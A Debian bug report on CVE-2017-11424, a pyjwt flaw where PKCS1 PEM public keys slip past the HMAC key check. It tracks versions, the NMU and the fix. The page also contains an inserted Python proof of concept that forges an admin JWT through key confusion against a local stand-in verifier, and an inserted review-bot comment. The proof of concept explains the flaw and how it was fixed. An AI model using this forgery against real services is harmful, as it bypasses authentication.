pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys

Related Vulnerabilities: CVE-2017-11424  

Debian Bug report logs - #873244


Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Fri, 25 Aug 2017 19:03:01 UTC

Severity: important

Tags: fixed-upstream, patch, security, upstream

Merged with 873815

Found in versions pyjwt/1.4.2-1, pyjwt/0.2.1-1+deb8u1

Fixed in versions pyjwt/1.4.2-1+deb9u1, pyjwt/0.2.1-1+deb8u2, pyjwt/1.4.2-1.1

Done: Salvatore Bonaccorso <carnil@debian.org>

Bug is archived. No further changes may be made.

Forwarded to https://github.com/jpadilla/pyjwt/pull/277




Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>:
Bug#873244; Package src:pyjwt. (Fri, 25 Aug 2017 19:03:04 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>. (Fri, 25 Aug 2017 19:03:04 GMT)


Message #5 received at submit@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys
Date: Fri, 25 Aug 2017 20:59:33 +0200
Source: pyjwt
Version: 1.4.2-1
Severity: important
Tags: security patch upstream
Forwarded: https://github.com/jpadilla/pyjwt/pull/277
Control: found -1 0.2.1-1+deb8u1

Hi,

the following vulnerability was published for pyjwt.

CVE-2017-11424[0]:
| In PyJWT 1.5.0 and below the `invalid_strings` check in
| `HMACAlgorithm.prepare_key` does not account for all PEM encoded
| public keys. Specifically, the PKCS1 PEM encoded format would be
| allowed because it is prefaced with the string `-----BEGIN RSA PUBLIC
| KEY-----` which is not accounted for. This enables
| symmetric/asymmetric key confusion attacks against users using the
| PKCS1 PEM encoded public keys, which would allow an attacker to craft
| JWTs from scratch.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2017-11424
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11424

Please adjust the affected versions in the BTS as needed. I think this
should be present as well in 0.2.1-1+deb8u1.

Regards,
Salvatore
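The symmetric/asymmetric key confusion described in the CVE text above, as an added example that is not part of this bug report or of pyjwt's own code. It assumes three things that are not on this page: the two `invalid_strings` lists are reproduced from memory of `HMACAlgorithm.prepare_key` in pyjwt 1.4.x and of the fix in the linked PR #277 (check them against the PR); the PEM blocks are constructed filler with the real armour headers, not real keys; and `verify()` is a minimal stand-in for a server that trusts the `alg` header of the token and hands its configured RSA public key to whichever algorithm the token names.

```python
import base64
import hashlib
import hmac
import json

# Constructed stand-ins for PEM files. The bodies are filler, not real keys:
# HMAC treats the text as raw bytes and never parses it, so only the
# armour header matters for the check being demonstrated.
PKCS1_PEM = (
    "-----BEGIN RSA PUBLIC KEY-----\n"
    "MIIBCgKCAQEAconstructedfillernotarealkey0000000000000000000000000000\n"
    "-----END RSA PUBLIC KEY-----\n"
)
SPKI_PEM = (
    "-----BEGIN PUBLIC KEY-----\n"
    "MIIBIjANBgkqconstructedfillernotarealkey000000000000000000000000000\n"
    "-----END PUBLIC KEY-----\n"
)

# The invalid_strings guard in HMACAlgorithm.prepare_key, reproduced from
# memory of pyjwt 1.4.x (vulnerable) and of the fix in PR #277 (assumption).
VULNERABLE_INVALID_STRINGS = [
    b"-----BEGIN PUBLIC KEY-----",
    b"-----BEGIN CERTIFICATE-----",
    b"ssh-rsa",
]
FIXED_INVALID_STRINGS = VULNERABLE_INVALID_STRINGS + [b"-----BEGIN RSA PUBLIC KEY-----"]


def prepare_hmac_key(key, invalid_strings):
    """Stand-in for HMACAlgorithm.prepare_key: refuse key material that is
    recognisably public (and therefore not secret) before using it as an
    HMAC secret. The whole bug is one marker missing from invalid_strings."""
    key_bytes = key.encode("utf-8") if isinstance(key, str) else key
    if any(marker in key_bytes for marker in invalid_strings):
        raise ValueError("asymmetric key or certificate used as HMAC secret")
    return key_bytes


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(claims, key_bytes):
    """Attacker-side signing: plain HS256 keyed on whatever bytes we choose."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    sig = hmac.new(key_bytes, signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def verify(token, key, invalid_strings):
    """Server-side verifier that trusts the alg in the header and always hands
    its configured key (an RSA public key) to the named algorithm. With
    alg=HS256 that public key becomes the HMAC secret unless prepare_key
    rejects it. Only the HS256 branch is modelled here."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("only HS256 is modelled in this example")
    key_bytes = prepare_hmac_key(key, invalid_strings)
    expected = hmac.new(key_bytes, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), sig_b64):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def forge_with_public_key(pem, invalid_strings):
    """Attacker who knows the server's PEM public key forges an admin token
    with HS256 keyed on the PEM text. Returns the claims the verifier accepts,
    or None if prepare_key rejected the key."""
    token = hs256_sign({"sub": "attacker", "admin": True}, pem.encode("utf-8"))
    try:
        return verify(token, pem, invalid_strings)
    except ValueError:
        return None


if __name__ == "__main__":
    print("PKCS1 PEM, vulnerable list:", forge_with_public_key(PKCS1_PEM, VULNERABLE_INVALID_STRINGS))
    print("PKCS1 PEM, fixed list:     ", forge_with_public_key(PKCS1_PEM, FIXED_INVALID_STRINGS))
    print("SPKI PEM, vulnerable list: ", forge_with_public_key(SPKI_PEM, VULNERABLE_INVALID_STRINGS))
```

The first call returns the forged admin claims: the PKCS1 header is not in the vulnerable list, so the public key is accepted as an HMAC secret and the attacker's HS256 signature verifies. The same PEM against the fixed list, and an SPKI (`-----BEGIN PUBLIC KEY-----`) PEM against either list, is refused. The library guard is a backstop; on the application side the real fix is to never let the token choose the algorithm, which in pyjwt means passing an explicit `algorithms=[...]` list to `jwt.decode` so that an HS256 token is rejected outright by a service that only issues RS256.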



Marked as found in versions pyjwt/0.2.1-1+deb8u1. Request was from Salvatore Bonaccorso <carnil@debian.org> to submit@bugs.debian.org. (Fri, 25 Aug 2017 19:03:04 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>:
Bug#873244; Package src:pyjwt. (Thu, 31 Aug 2017 08:09:09 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>. (Thu, 31 Aug 2017 08:09:09 GMT)


Message #12 received at 873244@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: 873244@bugs.debian.org
Cc: Moritz Muehlenhoff <jmm@debian.org>
Subject: Re: Bug#873244: pyjwt: CVE-2017-11424: Incorrect handling of PEM-encoded public keys
Date: Thu, 31 Aug 2017 10:06:00 +0200
Control: notfound -1 0.2.1-1+deb8u1

Hi

On Fri, Aug 25, 2017 at 08:59:33PM +0200, Salvatore Bonaccorso wrote:
> Please adjust the affected versions in the BTS as needed. I think this
> should be present as well in 0.2.1-1+deb8u1.

Whilst the test is missing as well in 0.2.1-1+deb8u1, pyjwt in Jessie
would probably not work as expected in this regard.

I'm removing the found version for 0.2.1-1+deb8u1 for now.

Regards,
Salvatore



No longer marked as found in versions pyjwt/0.2.1-1+deb8u1. Request was from Salvatore Bonaccorso <carnil@debian.org> to 873244-submit@bugs.debian.org. (Thu, 31 Aug 2017 08:09:09 GMT)


Added tag(s) fixed-upstream. Request was from bts-link-upstream@lists.alioth.debian.org to control@bugs.debian.org. (Thu, 31 Aug 2017 17:39:38 GMT)


Merged 873244 873815 Request was from Salvatore Bonaccorso <carnil@debian.org> to 873815-submit@bugs.debian.org. (Sat, 16 Sep 2017 13:15:07 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>:
Bug#873244; Package src:pyjwt. (Sat, 16 Sep 2017 13:21:08 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>. (Sat, 16 Sep 2017 13:21:08 GMT)


Message #23 received at 873244@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: 873244@bugs.debian.org
Subject: pyjwt: diff for NMU version 1.4.2-1.1
Date: Sat, 16 Sep 2017 15:16:55 +0200
Control: tags 873244 + pending

Dear maintainer,

I've prepared an NMU for pyjwt (versioned as 1.4.2-1.1) and
uploaded it to DELAYED/10. Please feel free to tell me if I
should delay it longer.

Regards,
Salvatore
[pyjwt-1.4.2-1.1-nmu.diff (text/x-diff, attachment)]

Added tag(s) pending. Request was from Salvatore Bonaccorso <carnil@debian.org> to 873244-submit@bugs.debian.org. (Sat, 16 Sep 2017 13:21:08 GMT)


Marked as found in versions pyjwt/0.2.1-1+deb8u1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Tue, 19 Sep 2017 18:39:04 GMT)


Marked as fixed in versions pyjwt/0.2.1-1+deb8u2. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Tue, 19 Sep 2017 18:39:05 GMT)


Marked as fixed in versions pyjwt/1.4.2-1+deb9u1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Tue, 19 Sep 2017 18:39:07 GMT)


Message sent on to Salvatore Bonaccorso <carnil@debian.org>:
Bug#873244. (Sun, 24 Sep 2017 22:45:14 GMT)


Message #34 received at 873244-submitter@bugs.debian.org:

From: Daniele Tricoli <eriol@mornie.org>
To: 873244-submitter@bugs.debian.org
Subject: Bug#873244 marked as pending
Date: Sun, 24 Sep 2017 22:40:44 +0000
tag 873244 pending
thanks

Hello,

Bug #873244 reported by you has been fixed in the Git repository. You can
see the changelog below, and you can check the diff of the fix at:

    https://anonscm.debian.org/cgit/python-modules/packages/pyjwt.git/commit/?id=628cc05

---
commit 628cc05d2b4e0e3791e8288783f7f6ab93747ea8
Author: Daniele Tricoli <eriol@mornie.org>
Date:   Sun Sep 24 20:17:21 2017 +0200

    New upstream release

diff --git a/debian/changelog b/debian/changelog
index 3cbfdf2..a50ff29 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,11 @@
+pyjwt (1.5.3-1) UNRELEASED; urgency=medium
+
+  * New upstream release. (Closes: #875951)
+    - Throw if key is an PKCS1 PEM-encoded public key (CVE-2017-11424)
+      Thanks to Salvatore Bonaccorso for working on this. (Closes: #873244)
+
+ -- Daniele Tricoli <eriol@mornie.org>  Sun, 24 Sep 2017 20:11:38 +0200
+
 pyjwt (1.4.2-1) unstable; urgency=medium
 
   * New upstream release.
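Review bot: the added changelog line `- Throw if key is an PKCS1 PEM-encoded public key (CVE-2017-11424)` has an article error and should read `a PKCS1`; this is the text users will grep for by CVE id in the shipped changelog, so it is worth fixing before the 1.5.3-1 upload. The new stanza also still carries the `UNRELEASED` distribution, so confirm it is switched to `unstable` at upload time.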



Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Mon, 25 Sep 2017 05:24:03 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Mon, 25 Sep 2017 05:24:04 GMT)


Message #39 received at 873244-close@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: 873244-close@bugs.debian.org
Subject: Bug#873244: fixed in pyjwt 1.4.2-1.1
Date: Mon, 25 Sep 2017 05:20:00 +0000
Source: pyjwt
Source-Version: 1.4.2-1.1

We believe that the bug you reported is fixed in the latest version of
pyjwt, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 873244@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated pyjwt package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sat, 16 Sep 2017 14:49:38 +0200
Source: pyjwt
Binary: python-jwt python3-jwt
Architecture: source
Version: 1.4.2-1.1
Distribution: unstable
Urgency: medium
Maintainer: Debian Python Modules Team <python-modules-team@lists.alioth.debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Description:
 python-jwt - Python implementation of JSON Web Token
 python3-jwt - Python 3 implementation of JSON Web Token
Closes: 873244
Changes:
 pyjwt (1.4.2-1.1) unstable; urgency=medium
 .
   * Non-maintainer upload.
   * Throw if key is an PKCS1 PEM-encoded public key (CVE-2017-11424)
     (Closes: #873244)
Checksums-Sha1:
 fcbdd6c39569614d0eca7a4ff5fe2d71509be4dc 2625 pyjwt_1.4.2-1.1.dsc
 2a472ac2821d412947f4cc9c7aa0eeccedd332c9 4756 pyjwt_1.4.2-1.1.debian.tar.xz
 2b7a5c05339e5140438e4d732f0576a4b656fdbb 6798 pyjwt_1.4.2-1.1_source.buildinfo
Checksums-Sha256:
 d89dea9e19465178fbffb94c5054eacfc242da825769efaae12a7bebd216dd6c 2625 pyjwt_1.4.2-1.1.dsc
 1aefc4545440e588652699fc06bf1dada43967b6f28e5fe2aec36f1d10bef793 4756 pyjwt_1.4.2-1.1.debian.tar.xz
 5d395d97d2f657d36ef15ccf658179b88a0b0e1bc9cad33ab4dc1c3cecdd0e6d 6798 pyjwt_1.4.2-1.1_source.buildinfo
Files:
 1c974b0263920eef9937800a7b8afc19 2625 python optional pyjwt_1.4.2-1.1.dsc
 0fe46c426d5c8ca71070da0665e76f7a 4756 python optional pyjwt_1.4.2-1.1.debian.tar.xz
 4536b23e70083436f0c2641f2377d7a8 6798 python optional pyjwt_1.4.2-1.1_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlm9I2RfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89ECJwQAIHpwvJjK0CxhgDKdbEbq8AUzbYgaGm8
szUK93vOpRNViGdqzI0U37KghpyQrKG/+XH/vwXekMGcszzaeFSilFrJPSyIXDto
nJhJDGLkysSm/X+Ywqp7uV2Xc7Ow26Acj8iRy5r+UrPOT3QsBxGksf6GtHVF+P9i
PhjYkyPNm4rNvgtocBYQ8X6cw/EjKJGtWM6O8w/w18bxzH3Y8uhcnEZlDYq5yixf
nxuHTTMqz1sWtIBk7UPAOErQ2YcgkpT4qGTyTPOCgo7lnXZf4/JidLP9R8HJWpDi
Ka18idd3cBr5oYsuRCT/ZMVzxZngRyA5Ac3VeIKz1g948/ncj6j+xHIV4nXZ1sj4
QlmzrpOLxahLwT3Fou1WjL68hBP82gCPXJgxpLCumqPDNYXRzI3AmgA/8o7e4Wjl
0ImZFc4oKb1CfC8Fq/B4p8B2tQS3mIpleyN+ZDPCbzhutDtHvlF4HLMaKycozb3z
uX14cNB3bGnleZ7B17TYRxXRkXzZ3d9UQtlsFml5AGdP+5EzZvVYiX21WeTbpmfm
kApmr2RTljw7euH7cCj34MHp9tRGLKkOBlXmrbyExBUQXMGGkHDBlYa0YJC2cDsA
AX5WAlRE5+uQTHlfgPNFSx00GdRLcOKuFCLKTSQkXNQADZL7APeEUje0xYGq2Yok
NL5hAuNDFPnZ
=oz8M
-----END PGP SIGNATURE-----




Reply sent to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility. (Mon, 25 Sep 2017 05:24:04 GMT)


Notification sent to "Leonidas S. Barbosa" <leo.barbosa@canonical.com>:
Bug acknowledged by developer. (Mon, 25 Sep 2017 05:24:04 GMT)


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 29 Oct 2017 07:26:04 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:07:58 2019; Machine Name: buxtehude
